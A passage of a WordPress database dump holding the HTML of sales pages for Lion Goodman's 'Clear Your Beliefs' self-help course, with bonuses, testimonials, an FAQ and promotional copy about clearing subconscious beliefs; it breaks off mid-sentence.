Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\n jQuery(''h5.hdr'').animate({\r\n    font-size: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:46:41', '2014-06-18 02:46:41', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1006, 4194, '2014-06-17 21:48:22', '2014-06-18 02:48:22', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what 